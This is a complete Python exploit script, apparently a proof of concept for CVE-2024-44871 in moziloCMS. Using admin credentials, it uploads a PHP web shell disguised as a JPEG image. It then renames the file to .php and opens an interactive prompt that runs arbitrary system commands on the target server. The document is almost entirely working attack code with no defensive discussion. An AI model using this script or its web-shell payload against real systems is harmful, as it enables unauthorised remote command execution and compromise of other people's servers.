README.md
Rendering markdown...
import requests
import argparse
import time
import uuid
import urllib
file_name = str(uuid.uuid4()).split("-")[0]
def login(session, target):
headers = {
"Host": f"{target}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
"Origin": f"{target}",
}
data = {
"username": f"{username}",
"password": f"{password}",
"login": "Login"
}
endpoint = "/admin/index.php"
url = f"{target}{endpoint}"
response = session.post(url=url, data=data, headers=headers)
if "moziloCMS Admin - Home" in response.content.decode():
return True
return False
def upload_shell(session, target, payload):
files = {"files[]": [f"{file_name}.jpg", payload.encode(), "image/jpeg"]}
data = {
"curent_dir": "Willkommen",
"chancefiles": "true",
"action": "files"
}
headers = {
"Host": f"{target}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
"Origin": f"{target}",
}
endpoint = "/admin/index.php"
url = f"{target}{endpoint}"
response = session.post(url=url, data=data, files=files, headers=headers)
if '"delete_url"' in response.content.decode():
return True
return False
def rename_file(session, target):
data = {
"action": "files",
"newfile": f"{file_name}.php",
"orgfile": f"{file_name}.jpg",
"curent_dir": "Willkommen",
"changeart": "file_rename"
}
headers = {
"Host": f"{target}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
"Origin": f"{target}",
}
endpoint = "/admin/index.php"
url = f"{target}{endpoint}"
response = session.post(url=url, data=data, headers=headers)
print(f"REPSONSE CODE: {response.status_code}")
if '"success' in response.content.decode():
return True
return False
def send_commands(session, target, endpoint):
response = session.get(f"{target}{endpoint}")
return response.content.decode().split("<pre>")[1].split("</pre>")[0]
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='CVE-2024-44871', description='uploads webshell', epilog='PLEASE USE RESPONSIABLY')
parser.add_argument("-p", help="enter password", required=True)
parser.add_argument("-u", help="enter username", required=True)
parser.add_argument("-t", help="target url with http/https but not ending with /", required=True)
args = parser.parse_args()
username = args.u
password = args.p
target = args.t
payload = '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>'
session = requests.Session()
if login(session, target):
time.sleep(1)
if upload_shell(session, target, payload):
time.sleep(1)
if rename_file(session, target):
print("shell has been activated\n")
file_dir = f"/kategorien/Willkommen/dateien/{file_name}.php?cmd="
while True:
command = ""
try:
command = str(input("# "))
if command == "":
break
except:
break
system_response = send_commands(session, target, file_dir + urllib.parse.quote_plus(command))
print(system_response)
else:
print("[-] Failed to rename file to php")
else:
print("[-] Failed to upload shell")
else:
print("[-] Login failed")
session.close()